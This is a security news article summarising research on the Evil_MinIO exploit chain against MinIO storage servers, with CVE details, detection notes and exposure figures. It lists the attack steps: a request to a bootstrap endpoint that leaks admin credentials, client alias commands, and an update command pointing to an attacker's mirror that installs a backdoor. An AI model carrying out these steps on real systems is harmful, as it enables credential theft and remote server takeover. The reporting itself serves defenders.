Publicly available Evil_MinIO exploit used in attacks on MinIO Storage Systems

Pierluigi Paganini September 04, 2023

A threat actor was spotted exploiting MinIO storage system vulnerabilities to execute arbitrary code on affected servers.

Security Joes researchers have observed an unknown threat actor using a publicly available exploit chain for vulnerabilities in the MinIO Object Storage system to achieve arbitrary code execution on vulnerable servers.

Object Storage is a data storage architecture for storing unstructured data into units called “objects” and storing them in a structurally flat data environment. The leading providers of such services are AWS, Google Cloud, and Microsoft Azure.

Upon investigating, Security Joes researchers discovered that the exploit chain was not observed in the wild before, or at least documented.

“The chain of vulnerabilities observed by our team during an attack we’ve investigated presents a worrisome situation where attackers can potentially gain the ability to remotely execute code and take full control over systems running vulnerable versions of the high-performance and distributed object storage system called MinIO.” reads the report published by Security Joes. “This product is part of a larger set of “non-yet-existing” set of attack vectors referred to as Non-native Object Storage Services.”

The exploit, dubbed Evil_MinIO, uses CVE-2023-28434 (CVSS score: 8.8) and CVE-2023-28432 (CVSS score: 7.5) vulnerabilities.

In April, the US Cybersecurity and Infrastructure Security Agency (CISA) added MinIO vulnerability CVE-2023-28432 to its Known Exploited Vulnerabilities catalog.

The researchers discovered that the evil_minio exploit code is available on a GitHub repository.

The flaws can be exploited by remote attackers to expose sensitive information stored in the compromised installation and facilitate Remote Code Execution (RCE) on the host where the MinIO application is operational.

An attacker can trigger the issue sending a crafted request to the endpoint “/minio/bootstrap/v1/verify” and retrieving the admin credentials of a vulnerable instance.

“The exploitation process begins with a crafted request targeting the endpoint “/minio/bootstrap/v1/verify”, which allows the attacker to obtain the values of the environment variables used by the application.” continues the report. “This becomes particularly significant because MinIO relies on environment variables to configure the administrator credentials, escalating the severity of the vulnerability. In other words, with a single request, an attacker can retrieve the admin credentials of a vulnerable instance.”

A mc admin update command updates all MinIO servers in the deployment, it also supports the use of a private mirror server for environments where the deployment does not have public internet access.

An attacker can arrange a deceptive update by pushing an ‘evil’ update instead of the authentic MinIO binary.

Below is the step-by-step procedure to remotely execute arbitrary code in a vulnerable MinIO instance:

  • 1. POST request to endpoint /minio/bootstrap/v1/verify to expose the credentials of the admin account.
  • 2. Attacker configures a MinIO client to interact with the vulnerable instance using the credentials gotten in Step 1. For this, the following command lines are required:mc alias set [ALIAS] [URL_TARGET_MINIO] [ACCESS_KEY] [SECRET_KEY] mc alias list
  • 3. Attackers trigger the update process on the compromised MinIO instance, pointing to a malicious payload hosted on a remote server. For this, the following command is admin update [ALIAS] [MIRROR_URL] –yes
  • 4. “Evil” MinIO is installed, now containing a global backdoor that allows the attacker to execute commands on the host.

The experts pointed out that different from web shell deployment, in the attack MinIO scenario, attackers leave no traces of conventional suspicious scripts on the disk

“The intricate nature of this threat renders traditional signature-based detectors inadequate in capturing its presence, as demonstrated in Figure 7. Remarkably, even a month after its initial report, the file continues to exhibit zero detections through traditional signature-based detection mechanisms.” continues the report.

According to the experts, the threat actor behind the attack has a unique profile, it has a significant degree of experience and expertise in working with bash scripts and the Python. The attackers also show the ability to use the backdoor access to drop supplementary payloads for post-exploitation activities.

The attackers are able to target both Linux and Windows systems using specific Downloader Script.s

At the time of the publication of the report, the researchers found over 50,000 MinIO installs exposed online using Shodan.

The report also includes Indicators of Compromise (IoCs) for this campaign.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, backdoor)

you might also like

leave a comment